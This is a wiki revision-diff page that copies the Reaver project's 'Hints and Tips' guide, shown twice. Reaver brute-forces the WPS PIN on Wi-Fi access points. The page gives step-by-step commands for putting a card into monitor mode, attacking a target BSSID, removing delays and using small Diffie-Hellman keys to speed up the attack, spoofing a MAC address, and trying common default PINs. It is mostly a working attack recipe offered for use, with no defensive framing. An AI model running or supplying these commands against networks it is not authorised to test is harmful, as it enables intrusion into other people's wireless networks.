Difference between revisions of "Reaver: Hint dan Tip"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips Prerequisites You must be running Linux You must have a wireless card capable of raw injection You must put your...)
 
Line 1: Line 1:
 
Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips
 
Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips
  
Prerequisites
+
==Prerequisites==
  
    You must be running Linux
+
* You must be running Linux
    You must have a wireless card capable of raw injection
+
* You must have a wireless card capable of raw injection
    You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.  
+
* You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.  
  
Basic Usage
+
==Basic Usage==
  
 
First, make sure your wireless card is in monitor mode:
 
First, make sure your wireless card is in monitor mode:
  
# airmon-ng start wlan0
+
# airmon-ng start wlan0
  
 
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
 
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
  
# reaver -i mon0 -b 00:01:02:03:04:05
+
# reaver -i mon0 -b 00:01:02:03:04:05
  
 
You will probably also want to use -vv to get verbose info about Reaver's progress:
 
You will probably also want to use -vv to get verbose info about Reaver's progress:
  
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
  
Speeding Up the Attack
+
==Speeding Up the Attack==
  
 
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
 
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
  
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
  
 
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
 
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
  
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
  
MAC Spoofing
+
==MAC Spoofing==
  
 
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
 
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Line 37: Line 37:
 
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:
 
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:
  
# ifconfig wlan0 down
+
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
+
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
+
# ifconfig wlan0 up
# airmon-ng start wlan0
+
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
+
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
  
Default Pins
+
==Default Pins==
  
 
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
 
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
Line 52: Line 52:
 
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
 
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
  
    Does the target AP support WPS and is WPS enabled?
+
* Does the target AP support WPS and is WPS enabled?
    Did you put your wireless card into monitor mode?
+
* Did you put your wireless card into monitor mode?
    Did you specify the monitor mode interface with the -i option?
+
* Did you specify the monitor mode interface with the -i option?
    Do you have a good signal from the AP?  
+
* Do you have a good signal from the AP?  
  
 
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
 
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
  
    Linux distro, distro version, and architecture (32 bit or 64bit?)
+
* Linux distro, distro version, and architecture (32 bit or 64bit?)
    Wireless card and driver
+
* Wireless card and driver
    Pcap file demonstrating the issue, if possible
+
* Pcap file demonstrating the issue, if possible

Revision as of 18:16, 29 March 2013

Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips

Prerequisites

  • You must be running Linux
  • You must have a wireless card capable of raw injection
  • You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.

Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Default Pins

It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first. Errors and Warnings

It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.

However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:

  • Does the target AP support WPS and is WPS enabled?
  • Did you put your wireless card into monitor mode?
  • Did you specify the monitor mode interface with the -i option?
  • Do you have a good signal from the AP?

If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:

  • Linux distro, distro version, and architecture (32 bit or 64bit?)
  • Wireless card and driver
  • Pcap file demonstrating the issue, if possible